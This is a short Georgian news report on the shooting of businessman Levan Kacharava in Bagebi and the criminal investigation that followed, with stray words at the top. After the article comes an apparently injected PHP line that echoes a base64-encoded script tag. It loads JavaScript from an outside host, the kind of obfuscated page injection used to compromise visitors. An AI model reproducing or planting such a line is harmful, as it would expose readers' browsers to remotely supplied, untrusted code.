celsiusi
ავერსი შნაიდერი

ბაგებში, მანქანაში, ცეცხლსასროლი იარაღით ბიზნესმენი, ლევან კაჭარავა მოკლეს. ბიზნესმენი 53 წლის იყო. ლევან კაჭარავა კომპანია Silk Road Group-ის თანადამაარსებელი იყო. ამასთან, მანვე დაარსა კომპანიების ჯგუფი MULTIPLEX, რომლის ძირითადი საქმიანობის სფეროები ენერგეტიკა და ლოჯისტიკაა.

რაც შეეხება მომხდარს, არსებული ინფორმაციით, ბაგებში ურთიერთშელაპარაკება საყოფაცხოვრებო ნიადაგს უკავშირდება.

გამოძიება სისხლის სამართლის კოდექსის 108-ე (განზრახ მკვლელობა) და 236-ე მუხლით (ცეცხლსასროლი იარაღის უკანონო შენახვა-ტარება) მიმდინარეობს. შემთხვევის ადგილზე სამართალდამცველები არიან მობილიზებული.

666
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");